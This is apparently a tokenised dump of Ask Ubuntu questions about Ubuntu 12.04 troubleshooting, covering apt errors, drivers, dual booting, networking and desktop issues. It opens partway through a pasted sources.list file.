//archive.ubuntu.com/ubuntu precise-security universe deb-src http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu oneiric partner # deb-src http : //archive.canonical.com/ubuntu oneiric partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //packages.dotdeb.org stable all # deb-src http : //packages.dotdeb.org stable all # deb http : //ppa.launchpad.net/bean123ch/burg/ubuntu lucid main # deb-src http : //ppa.launchpad.net/bean123ch/burg/ubuntu lucid main this is the error given by apt-get update which stops at 64 % reading w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ precise/universe amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ precise/main i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ precise/universe i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ precise-updates/restricted amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ precise-updates/restricted i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-i386_packages )
184425	error opening cache	i have been reviving the following error today , because of this i can not install any programs or update or any thing . w : gpg error : http : //ppa.launchpad.net precise release : the following signatures were invalid : badsig 464ad83d4631bbea launchpad equinoxart e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_tiheum_equinox_ubuntu_dists_precise_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . this code is from running apt-get update . i also read that this could be because of un-met dependences how would i resolve this ?
184430	where to find and install asus motherboard drivers for linux	this is my second day ever with linux , and i had one heck of a time getting the nvidia drivers installed and working . please , keep in mind i am very new and just starting out . i currently have an asus p8z68-v le motherboard and i 'm not sure if the drivers are installed . where would i go to find that out ? i am using gnome as my ui . if i do n't have the drivers installed , where would i go ? the asus site only gives me options to download for various windows os , dos and `` other '' ( in .rom format ) . which should i take and how should i install ? i 'm mostly looking for audio drivers . a lot of music i play , either on youtube or with vlc has a faint crackling in the background on ubuntu , which gets much worse the higher i turn the volume up . could this be something other than the drivers ? i doubt it 's the hardware since the sound seems fine on windows . i am currently running 12.04 .
184432	only wubi needed ..not the ubuntu 12.04	first , thanks for taking time to answer my question . my question is that i have ubuntu 12.04 with me but no wubi is in there..its asking me to do a regular ubuntu installation instead of wubi installation in my windows . so i only need the wubi not the ubuntu installation files..how do i make sure that wubi installation file i will download form ubuntu.com will not initiate a download of ubuntu 12.04 again as i already have the installation iso with me and direct wubi to use that iso to install ubuntu alongside windows ?
184440	samsung tv - mode not supported	i am trying to install ubuntu on an old aopen xc cube . it works fine on a normal pc screen , but when i connect it to the samsung flat-screen tv i am going to use it on , i get the message mode not supported . if i first log in connected to the pc screen and then change to the samsung it works . but every time i boot up connected to the tv , i get the mode not supported message . and if i then change back to the pc screen i only get the option to choose between a few crappy resolutions and none of the are supported by the samsung . when i googled it , it seemed that some have had the same problem with ps3 on samsung flat-screens . can anyone help ?
184442	how do i manually add sites to firefox 's speed dial ?	firefox now has a speed dial you can use in its new tab page , and it automatically populates it with sites that you visit often . these can then be pinned in there if you always want them visible . but suppose i do n't want to wait for a site to show up in there before i can pin it . is there a way to manually enter a url that i want to show up in the speed dial ?
184447	postgresql server does n't listen	i just recently install postgresql on our server via ssh . the installation went successful , until the time i tried to connect to it using pgadmin on my windows machine . i received this kind of error : could not connect to server : connection refused ( 0x0000274d/10061 ) is the server running on host `` xxx.xxx.xxx.xxx '' and accepting tcp/ip connections on port 5432 ? the docs suggest this can be fixed by setting the value of listen_addresses = '* ' in the /etc/postgresql/9.1/main/postgresql.conf . i did that but still it wo n't let me . what seems to be missing ?
184449	play music from server	i want to configure ubuntu server to play music from the same server , with a couple of points : it will not do streaming . it will play the music from the server to the speakers connected to it . it will be controlled by an app that offers a webpage to connect to the music list .
184450	how to remove ubuntu and install xp ?	dvd player works during start up , but stops after few seconds . then ubuntu starts up . so i ca n't install xp . i changed bios to dvd on 1 . i heard that i could loosen the cmos battery , but i dare not doing that . is there an other way ?
184451	no gui on ubuntu 12.04 server after install ubuntu-desktop	i just got a dedicated server from hosting company and i want to use a gui desktop ( ubuntu desktop 12.04 + x2go 64-bit system ) . so i did the following : sudo apt-get update sudo apt-get upgrade sudo apt-get install ubuntu-desktop sudo reboot i then install vnc : sudo apt-get install tightvncserver and run vnc . but i only see the terminal , not the gui .
184452	hud does n't work with firefox and thunderbird	i have just upgraded to 12.04 and i have hud running for many applications apart from firefox ( v14.0 ) and thunderbird . i know that this is not default behaviour for many programs , but i have searched around in internet and i see that other people with my distribution version , do have hud in firefox . in my case the normal firefox menus appear , and no firefox-relevant option shows up in hud , when hitting the alt key . does anybody know why is this and how can i solve it ? edit : one the same ubuntu computer , i used another user account , and i opened firefox . hud is working there . so it is a user specific setting
184461	problem with setting the keyboard command for show desktop	i followed the instructions provided in the link enabling native shortcuts on gnome - 3 for setting the shortcut of ctrl+alt+d for showing desktop and yet it does not seem to work . i can send a screen-shot of the setting in my system as a new user i am not allowed to attach the image in this query.i have tried logging out as well as restart of my system . request someone to help on this .
184465	slash ( `` / '' ) in thinkpad t420 abnt keyboard	i have a lenovo thinkpad t420 with a brazilian abnt keyboard layout . this is a rather unique layout where the slash is between the context menu key and the arrow keys . however , the slash key does not work ! how could i make it work ?
184467	kerberos with active directory	so i 've setup kerberos on ubuntu in various ways ( likewise-open , winbind , etc ) and keep coming up with the same problem . kinit works fine and i get the initial ticket , but when i try to access a proxy authenticated with iwa , it always makes a request for the new ticket as http/proxy.local , which fails . i 'm assuming that it should be http/proxy.example.com but ca n't figure out what 's going wrong . any ideas ?
184468	how to enable mod_rewrite for xampp ?	i am getting a 404 not found when doing a mod rewrite in my htaccess file , accessing localhost how can i get this to work , all references i found point me to edit a file in /etc/apache2/mods-enabled for me there is no /etc/apache2 folder , where is apache installed then ? using xampp , http : //www.apachefriends.org/en/xampp-linux.html
184471	split network between eth0 and eth1	at work , i have two networks - the hard wired eth0 is great for getting to local resources , but it is tied to a really slow internet connection . my wifi , on the other hand , is a fast wireless n. i 'd like to set up my routes so that 192.168 . * and 10.1 . * go out over eth0 , but everything else goes out over eth1 . this will let me connect to my local resources but keep my web browsing snappy . i know it 's possible - i did it with a prior ubuntu install before my hard drive failed but i did n't document it and i ca n't get help from the person who set it up for me . any help would be hugely appreciated ! edit : results of route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.201.1 0.0.0.0 ug 0 0 0 eth1 192.168.201.0 0.0.0.0 255.255.255.0 u 2 0 0 eth1`
184472	why does my computer freeze when i adjust the brightness ?	as the title says , in 12.04 , when i hold fn and press the up and down arrow keys to adjust my screen brightness , the screen starts to flicker , and the os freezes . i have to hold the power button to force it to shut down , and start it back up . i ca n't seem to adjust the brightness .
184475	dell laptop 's bluetooth is n't detected by ubuntu	i have dell vostro 3500 laptop . i installed ubuntu 12.04 . it does n't detect my bluetooth . below is my information . lsusb | grep bluetooth bus 001 device 003 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) lsmod | grep bluetooth bluetooth 158438 10 bnep , rfcomm rfkill list 0 : brcmwl-0 : wireless lan soft blocked : yes hard blocked : no 1 : dell-wifi : wireless lan soft blocked : yes hard blocked : no ( wifi working fine . i disabled it using network menu . so , it 's fine ) dmesg | grep bluetooth [ 21.981835 ] bluetooth : core ver 2.16 [ 21.981872 ] bluetooth : hci device and connection manager initialized [ 21.981877 ] bluetooth : hci socket layer initialized [ 21.981881 ] bluetooth : l2cap socket layer initialized [ 21.981891 ] bluetooth : sco socket layer initialized [ 21.986047 ] bluetooth : rfcomm tty layer initialized [ 21.986059 ] bluetooth : rfcomm socket layer initialized [ 21.986065 ] bluetooth : rfcomm ver 1.11 [ 22.361783 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 22.361791 ] bluetooth : bnep filters : protocol multicast so how can i fix this ? i saw other place ( i do n't remember which site ) they said , some times , when in windows , if bluetooth disabled by windows driver , it ca n't be enabled by linux . so , i should install windows and enable blueethooth from windows and then re install linux . that is impossible for me , because i do n't have windows installation media . but i tried this , which is i installed windows xp on virtual box . vbox showed me thow unknow usb devices . i connected them and installed windows bluethooth drivers to xp . but it did n't ditected bluethooth either . also , when i set off mode in hardware switch , those unknown devices disappear from vbox usb device seletcion menu . so , they are definitely something to do with wifi or bluethooth . please help me..
184479	install 12.04 on top of existing linux mint installation	this question has been answered before in many places but i just need some confirmation with my specific setup . i have linux mint installed and i just want a fresh ubuntu 12.04 install to completely replace mint . it 's dual booted with windows 7 and i want that to remain completely in tact . anyway , i 'm currently running the live cd installer . i 've said i want to specify my own partitions and i 'm at the following screen : the list at the bottom expanded : i confused by all the different partitions . seems like i should just check the box beside sda5 . but what about sda6 ? do i just leave that alone ? also just for confirmation , is the `` right '' way to replace mint , or should i be deleting it first ?
184480	how to recover removed packages with the purge flag ?	i accidently removed a package with the purge flag and it removed large parts of the ubuntu system , including the pulseaudio server , the software center , system settings and many , many other programs and libraries . i do n't exactly know what the purge command does , but i 'm pretty sure that it 's used to remove a package along with it dependencies . so i guess it removed every package that shares dependencies with the package i wanted to remove , but it still does not make any sense . i have the complete dpkg.log of removed packages , but reinstalling them via terminal is nearly impossible . what should i do to recover the removed packages ?
184483	ethernet not working on a dell inspiron 14z	when i plug in a network cable , it is not recognized . the wi-fi is working properly , though . ifconfig output : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1645 errors:0 dropped:0 overruns:0 frame:0 tx packets:1645 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:206840 ( 206.8 kb ) tx bytes:206840 ( 206.8 kb ) wlan0 link encap : ethernet hwaddr e0:06 : e6 : de:57 : e7 inet addr:150.164.201.145 bcast:150.164.201.255 mask:255.255.255.0 inet6 addr : 2001:12f0:601 : a921:98a2:3dd:3be8 : c483/64 scope : global inet6 addr : 2001:12f0:601 : a921 : e206 : e6ff : fede:57e7/64 scope : global inet6 addr : fe80 : :e206 : e6ff : fede:57e7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:23892 errors:0 dropped:0 overruns:0 frame:0 tx packets:14676 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:30123226 ( 30.1 mb ) tx bytes:2189050 ( 2.1 mb )
184487	i ca n't get my wireless working on ubuntu 12.04 . i have a dell inspiron 6400	as above . i tried alot of the solutions i found in the forum but have had no success . sorry i 'm a bit of a newbie with linux ! !
184488	rollback instead of completing dpkg-configure -a ?	on a new vps , aptitude dist-upgrade hangs during /usr/sbin/grub . now , aptitude is in a bad state : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . i ca n't successfully complete this command , because of /usr/sbin/grub hanging . can i rollback instead ? ( this is on 12.04 )
184495	why byobu custom status notification code fail to show in color ?	the code below runs well in bash and shows text with proper green background color but when i add it to the ~/.byobu/bin/ folder it shows the escape characters instead . something like [ 42m [ 1maapl:30.345 ( b [ m # ! /bin/sh echo `tput setab 2 ; tput bold`aapl : `curl -s 'http : //download.finance.yahoo.com/d/quotes.csv ? s=aapl & f=sl1d1t1c1ohgv & e=.csv ' | cut -d , -f2 ; tput sgr0`
184498	how to do a fresh install of 12.04 on non-pae cpu pc ?	i can not install 12.04 desktop on non-pae cpu pc . keep getting error message on missing cpu feature . i prefer alternate install cd . thanks
184504	quicklists for unity launcher 's home folder icon not working when nautilus is closed	if nautilus file manager is closed and i right-click on its home folder icon on unity launcher , only the tab `` open in a new window '' appears . quicklists ( with all my bookmarks ) of the home folder icon works only when nautilus is already open . i really do n't understand what might have happened ... how to restore it ? thanks !
184506	ubuntu 12.04 : open launcher elements only with double click	sometimes i click the icons of the launcher by mistake and i have to wait until the program opens to close it again . how to open the programs in the launcher only if i double click them ? thanks .
184512	xubuntu and lubuntu based distro slow	i have a compaq presario sr1950nx desktop computer . amd64 3800+ processor 1gb ram it seems that ubuntu , xubuntu and lubuntu are all laggy . things are slow , such as : clicking on menus opening programs the ui renders in pieces when using the browser the system slows down considerably i ran the top command and i do notice that xorg hits 30 % to 40 % cpu when running the browsers . i have tried these distros on a spare p4 machine and it is even worse . as long as i do n't have a several things open at one time i can manage to get around although sluggishly . can anyone tell me what is it that i might be doing wrong ? i have an integrated nvidia card and have tried several of the recommended drivers which sometimes result in no boot screen upon reboot .
184516	nvidia gts 450 hdmi problem	problem : i have a nvidia geforce gts 450 video card and a samsung tv series 4 43 and i have it connected to my computer via a mini hdmi cable and all the hardware works perfectly . i installed 12.04 64bit perfectly , but the problem is when i want to change the screen resolution . i tried to change the driver installed that comes directly from the nvidia page but it gave me an error at the end . maximum resolution it presents is 1024x 768 and it is supposed to introduce more resolutions now that it is connected through a hdmi cable . question : is there an updated driver i can get for linux which would work ? if not does anyone have a suggested fix for this ?
184518	join domain and dos app	first off , yes i have read all the related topics and those fixes are either out of date or do n't work . i am running 12.04 and i would like to add it to the windows 2008 server network . after i get that done i would like to mount the f : \ drive of the server somewhere on my linux machine where it can be identified as drive f : \ by wine or dosemu . if i can achieve all of that , i need to find out how to run a ms-dos 16-bit point-of-sales graphic program in ubuntu . whether that be through wine , dosemu , or dosbox , it does not matter , it just has to be able to read and write to the servers f : \ drive , operate the dos app , and support lpt1 ( i think ) for printing receipts and loading tickets . i am a decently knowledgeable windows tech , at least thats what my job description says . but this is my first encounter with linux in a work environment , it could prove to very experience changing if i can just prove it as a practical theory and a reasonable solution , and get it to work . the first step is to get it joined to the domain . i have likewise-open cli and gui versions , samba , and gadmin-samba installed in attempts to get any of them to work . any help in any area is greatly appreciated , especially with the domain joining since it is the first step and what i thought would be the easiest step .
184519	no gui 12.04 login terminal screen only . startx does n't work	so i just went through driver update . the os froze so i had to hard reboot the pc . now i just get the login promt in terminal . startx does n't work . any ideas ?
184522	no bluetooth connection for keyboard and mouse for dell xps m2010	i hope someone may be able to provide some assistance . i am running dual-boot windows 7 and ubuntu 12.04.1 lts
184524	i have no password but ubuntu thinks i still do im trying to change it but i cant	it shows the `` current password '' field but i do n't have a password what do i do ? ? ? ? ? ? ? please help me
184526	how to get bus and device relationship for a /dev/ttyusb	i need to write an script for restart usb dongles . i have all tools but i ca n't link my /dev/ttyusbx to physical bus and device . an issue is that i have three dongles with the same id vendor and id product . if i do lsusb the output is : bus 001 device 004 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e270 hsdpa/hsupa modem bus 001 device 006 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e270 hsdpa/hsupa modem bus 001 device 007 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e270 hsdpa/hsupa modem bus 001 device 002 : id 80ee:0021 bus 001 device 001 : id 1d6b:0001 linux foundation 1.1 root hub and i have attached it to : /dev/ttyusb0 /dev/ttyusb3 /dev/ttyusb5 but i want to know which device is related with which bus device . by example i need to get the following : /dev/ttyusb0 - > bus 001 device 006 /dev/ttyusb3 - > bus 001 device 004 /dev/ttyusb5 - > bus 001 device 007 i 'm using ubuntu server 10.04 and i tested the tools : lsusb hal lsmod but i ca n't get the relationship .
184530	disable opengl for compiz from command line	i can run compizconfig settings manager ( ccsm ) and uncheck opengl . how can i do the same thing , but from the command line ? i need to add this step to a machine provisioning script .
184532	problems with both lightdm and gdm using displaylink usb monitor	when i use lightdm , it will auto-login to desktop just fine . the only problem is compiz does n't work , and menus do n't work . i ca n't right-click the desktop , and i ca n't select program menus in the top bar ( i.e clicking `` file '' does nothing ) . when i use gdm , i only get a blank blue screen and the mouse cursor . i ca n't ctrl+alt+backspace to restart , but i can ctrl+alt+f1 and ctrl+alt+f7 to switch modes . i do n't think it 's auto-logging me in , but i 'm not sure . it plays the login screen noise . will update with more information when i get home ! edit : okay , so i did a fresh install , just to ensure i had n't borked something playing in the console . i reconfigured my setup as i did before , with the same results . here 's what i followed . the only difference is that instead of setting `` vga=normal nomodeset '' i set `` grub_gfxpayload_linux = text '' . also i only have the displaylink monitor configured in my xorg.conf file . at this point i 'm using the open radeon driver , although i used the proprietary ati driver before . i 'm not sure if i 'm having a problem with : - x configuration - graphics driver - displaylink driver - unity - lightdm - compiz - or something else the resolution of the monitor is 800x480 , 16bit . i tried setting a larger virtual resolution of 1200x720 ( because the real resolution is lower than the recommended resolution ) , but it causes ubuntu to boot into low graphics mode . when i get home i 'm going to install the fglrx driver and see if it enables virtual resolutions , which may further enable my window manager to function properly . edit2 : just discovered the concept of composite rendering . i 'll try disabling that in xorg.conf too . edit3 : why is n't this working ? if you need to see a file or log , let me know .
184534	how do i change the software center icon in the launcher ?	i 'm not a big fan of the software center icon ( apparently i 'm not the only one : http : //www.omgubuntu.co.uk/2011/09/software-centre-icon-proposal ) . is there a way change it ? the answers to this related question does n't make it clear whether there is : how to change the dash icon in the unity launcher ? as far as i can see the software center icon is n't in nautilus /usr/share/unity/5/ so where could it be ?
184536	problem shutting down	sometimes i have a problem shutting down . i get a box saying `` a program is still running - gnome settings daemon '' and this just stays there . i can workround the problem by cancelling the box and doing shutdown again but it would be nice to resolve the problem another way .
184537	synchronize default applications between ubuntu installations	i want to find a way to synchronize the default application preferences for ubuntu between multiple installations . for example , if i choose geany as the default text editor for .js files , i want it to become the default text editor for all of my ubuntu installations . is there any software that makes this possible , or software libraries that i could use to implement such a feature ?
184545	unable to install 12.04 on a lenovo u410 ultrabook	i recently bought a lenovo u410 ultrabook and tried installing 12.04 . once i enter the installation process , i am not able to see available partitions . is it because of the 32gb ssd that is available in the hdd ? if so , how do i solve this problem ?
184547	find randomart of existing ssh key	i created an ssh key with ssh-keygen , and i got this output as a result : the key fingerprint is : 84:21:3d : ab : d5:5e:05 : a0 : b6 : ab:0f:33 : af:3b:3b:82 cidr @ randombox the key 's randomart image is : + -- [ rsa 4048 ] -- -- + | .ooo| | o ..o | | o + .oo . | | . + o ... . | | + ... s .. | | .o . | | . o o .. | | e . .o + | | ... ... | + -- -- -- -- -- -- -- -- -+ is there a way to view the randomart image of an existing key ? ( also , what 's the purpose of randomart in connection to ssh or cryptography ? )
184550	post deploy maas cleanup	i have a mostly working maas cluster . i 'm still learning juju , but while i 'm doing that , i wanted to take this opportunity to do some clean-up tasks . here are my goals : configure ntp on the nodes . set the video mode on the nodes . set the timezone on the nodes . are these juju tasks ? or is this better attacked by mounting the disk image on the maas host , and doing the configuration there ? if i do it that way , how do i get the nodes to recognize that they have to re-install the image to pickup my changes ?
184553	how to get gui back after freeze interrupted an nvidia driver update ?	i just went through a driver update . the os froze , so i had to hard reboot the pc . now i just get the login prompt in terminal . so , i tried to run startx . codeerror : api mismatch : the nvidia kernel module has version 304.43 but this nvidia driver component has version 295.49` i just got this error . i have to type sudo su then modprobe ndiswrapper to get my wi-fi to work , so step by step instructions after that would be greatly helpful .
184558	xorg-edgers ppa with llvmpipe breaks amd apu system	i 've read before where this had happened to another user with the same system ... i was running ubuntu 12.04 lts with kernel 3.2.0.29 and decided to give xorg-edgers a try . i purged fglrx* and xorg* before beginning . i upgraded with sudo apt-get upgrade -d the system downloaded and installed 109mb worth of data to the system , including llvmpipe which i am very unfamiliar with , and kernel 3.5.0.11 . the system was then rebooted to finalize the upgrade . the system boots to a black screen and then tells me `` the system is running in low-graphics mode '' . did i miss a step in the install ? or do the newest open-source drivers just not work with my hardware ? i realize this hardware ( apu ) is some of the newer development . i dropped to command via the fallback menu and attempted to boot lightdm as root , but the system hangs in 'configuring kernel parameters ' at starting initializes zram swaping . ... and then it just sits there . the other thing that concerns me is the output at the top of the screen that says : could not write bytes : broken pipe does llvmpipe work for this type of system ? to be clear the system is : msi x370-206us laptop radeon hd 6320 amd e450 apu 1.67ghz dual-core any help would be much appreciated . like i said , i 'm pretty sure i followed the right order of operations for the install procedure , but i was curious if anyone with similar hardware had experienced anything similar .
184559	ubuntu lts performance is good but sometimes slow	ubuntu unity is fast in my computer running multiple windows etc. , but after an update , software center suddenly shows and when a script stops running ( usually when i 'm on fb ) , it suddenly slows down and sometimes freezes . how do i prevent the script to suddenly stop ? how do i choose a tag , its so difficult to put one ?
184561	why does the size of ubuntu 12.04 iso increase once fully downloaded ?	i downloaded ubuntu 12.04 three times ( 32-bit ) and on all occasions the 'download ' under 'tool ' gives the size as 695 mb during the process of downloading . but when it is completed , and seen in the 'downloads ' folder , the size is shown as 729 mb or more . is it a problem of malware ? i am already using ubuntu 12.04 ( upgraded ) . i tried to download 12.04.1 for burning in cd and for use by others . i followed the md5sum ubuntu-12.04-desktop-i386.iso as suggested . it returned e235b63c02644e219b7bf3668f479c9e instead of d791352694374f1c478779f7f4447a3f .
184573	dell inspiron 14z laptop vs dell inspiron 14z ultrabook	just wanted to know if both of these are fully compatible with ubuntu ? if only specific versions of ubuntu are compatible , then which ones ? http : //www.dell.com/ca/p/inspiron-14z-5423/pd http : //www.dell.com/ca/p/inspiron-n411z/pd matters i am more concerned about are : 1 ) affect on battery life for both ? 2 ) dual boot without the need to re-install windows ( do n't want to use pirated copy ) on a separate partition ? i can definitely re-partition using partition magic/easeus . 3 ) also , i would not prefer keeping my os 's on ssd ( in case of 14z ultra-book ) it would be a great help , as i am considering to buy one of these with prime reason of ubuntu .
184574	installed ubuntu next to windows but ca n't find windows	i just installed ubuntu onto my hard drive from a usb drive . when i reached the partitions screen , i noticed it listed the full hard drive as `` free space '' even though i already had windows 7 installed . i knew i had about 50 gb of free space on the hard drive , so i partitioned sda1 for 35 gb and installed ubuntu onto it , and partitioned sda2 for 4 gb of swap space . the installation went fine , but when i reach the grub boot menu , there is no option for windows 7 -- only ubuntu . it seems as though my windows 7 installation has completely disappeared . this would be very unfortunate , as i had aplenty of files on windows , so your help is much appreciated .
184577	postgresql 9.1 adminpack install	everywhere i see guides for postgre , it seems to be on version 8.4 . in that case the instruction is : sudo -u postgres psql < /usr/share/postgresql/8.4/contrib/adminpack.sql that location does n't exist in the 9.1 directory apparently . can anyone point me how to get it working ( needed for pgadmin ) ?
184581	how do i search a pdf file from command line ?	i 'm checking references of a paper and want to find the positions in the body where some paper ( in the references list ) is referenced . is there a pdf editor which supports search via bash and extract the context of a position ? i 've tried to convert pdf to text , but did n't have a good result .
184582	how to install kde for different user on ubuntu 12.04	i am using ubuntu 12.04 gnome 2d . i want to install different desktop environments for different users , there are only 3 different users , 2 of them are in soders list with nopasswd i want one user to use kde and other to use gnome . how to do that ?
184583	file sharing from guest virtualbox ( 12.04 ) to host ( 10.04 )	i 've completed 90 % of this walkthrough : https : //help.ubuntu.com/community/virtualbox/sharedfolders # getting_vboxlinuxadditions.iso ... and i 'm currently in the `` prepare guest `` section . where this is giving me problems : sudo mount -t vboxsf -o uid=1000 , gid=1000 $ sharename /mnt/ $ sharename \ the `` -t `` option is giving me issues as per this error message when running the full set of commands : mkdir invalid option -- t try ' mkdir -- help ' for more information . so ! if i 've already configured the share on the host ... and i 'm attempting to mount a local dir on the guest system for the host to view ... what should i be doing differently here ?
184584	backlight does not work on toshiba portege and lts 12.04	i have a toshiba portege . since some time i try to enable the backlit function but without success . i found several posts that should solve it , for example : backlight issue but it did n't work for me ( although now i can set the screen brightness ! ) . i have lts 12.04 . my /etc/rc.local is here : setpci -s 00:02.0 f4.b=00 exit 0 and my /etc/default/grub here : grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' grub_cmdline_linux= '' acpi_osi=linux '' thank you for your comments and help !
184585	package installation failure	whenever i try to install any new package or upgrade a package , it fails with below mentioned error : setting up install-info ( 4.13a.dfsg.1-5ubuntu1 ) ... /etc/environment : line 1 : path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : no such file or directory dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : install-info e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i checked all the directories mentioned in path variable exists .
184590	erratic flash player behavior	as mentioned in another question , i am very new to linux , so bare with me ... i installed flash player yesterday , and since then i notice it fast-forwarding and skipping by itself . sometimes i 'll start a video and it plays half the video in a couple seconds ( like it 's being accelerated x2 or x4 ) with the sound playing as fast . other times it 's only the first 3 or 4 seconds that are accelerated . other times it `` skips '' like an old record . it loops the same 1 second of the video for around 5 seconds , then continues . it seems more prone to doing this when i 'm doing something else ( browsing another site , working in another program in ubuntu , etc . ) while the video is playing . this quirk is specific to flash ( when playing music/videos in vlc the problem does not exist ) and my browser is google chrome . i have n't spent enough time in chromium or firefox to see if the issue is chrome-specific . this is on ubuntu 12.04 .
184591	will windows become corrupted if ubuntu is dual installed on it	i want to install ubuntu as a dual partition on top of my windows 7 home basic . i am planning to empty my d drive ( 80 gb ) , and use that space to install the ubuntu . however , i have heard some guys saying that if ubuntu is installed on top of windows , the latter becomes corrupted . is it true ? and secondly , after installing successfully ( if possible ) , if i uninstall ubuntu , will windows reclaim all the occupied space in the d drive normally ?
184593	reverse-engineer driver for multi-colored backlit keyboard on clevo laptops	here 's my situation : i recently purchased a sager np9170 ( same as the clevo p170em ) and it has a multi-colored , backlit keyboard . under windows 7 , you can launch an app that allows you to change the color of the backlighting to any of a handful of colors ( blue , green , red , etc ) . i want that same functionality under linux . i have n't been able to find any software that does this , so i guess i 'm going to have to write it myself . i 'm a programmer by trade , but i 've have n't done much low level programming , and i 've certainly never written a device driver , so i was wondering if anyone could answer these two questions : 1 ) is there any software already out there that does this sort of thing ? i 've looked fairly thoroughly but have n't found anything applicable . 2 ) where would i start in trying to reverse engineer this sort of thing ? any useful articles , tutorials , books that might help ? and just to clarify : the backlighting already works , that 's not the problem . i just want to be able to change the color of the backlighting . this functionality is supported by the hardware . the laptop came with windows software that does this and i want the same functionality in linux . i am willing to write this software myself , i just want to know the best way to go about it . thanks !
184601	alt tab stopped working properly suddenly in ubuntu 12:04 unity	i have been working on my laptop since morning and suddenly before some time my alt-tab functionalist stopped working properly . some times it switchs between the windows some times not , even if it switches , it only switches to the next window and does not show the preview of all windows . suddenly once in a while it shows previews of all windows but then too it switches only to the next window and goes away . i logged out and logged and even restarted the machine but that did not help i do n't know that the hell happenned to ubuntu to stop it working suddenly , i am so fed up to go to the touchpad now and then to switch windows : ( i have chrome , sublime text pidgin and termial windows open if i am on chrome it switches to pidgin 's conversation window after few alt-tab . but then again aonly after few tries it switches back to chrome . in between one in a while the switcher preview is diplayed for few seconds and disappers . this same happens when i am switching between sublime and terminal . in all its happening for all windows that are open . i thing i noticed when i do alt + tab it mostly detects it only as tab any solutions ?
184603	what are the best screencasting tools ?	please i wan na know ( people whom have tried ) which sceencast tool is the best . for me i 've tried kazam but i still unconvinced totally with this choice . i need your expert please . thanks in advance
184604	openoffice does n't work	i installed openoffice on 12.04 , and set it as the default utility for spreadsheets , but it does n't run at all . while trying to troubleshoot , i read that it is not recommended to install it alongside libreoffice . i am about to uninstall openoffice because i do n't know how to get it working , and libreoffice is opening my spreadsheet just fine . but just out of curiosity , i also read that i should try deleting .openoffice.org folder ; but from where ? i do n't see it under /usr/lib , nor under my /home .
184607	unable to install ubuntu 12.04 on windows 7	an error occurred : error executing command command=c : /windows/system32/bcdedit.exe/set { aaf19def-e9a5-11e1-86de-9f7ceafcb45f } device partion=d : ..retval=1 ..stderr=an error has occurred setting the element data . the request is not supported . ..stdout= for more information , please see the log file : c/users/admin/appdata/local/tem/wubi-12.04-rev265.log please help me solve the problem .
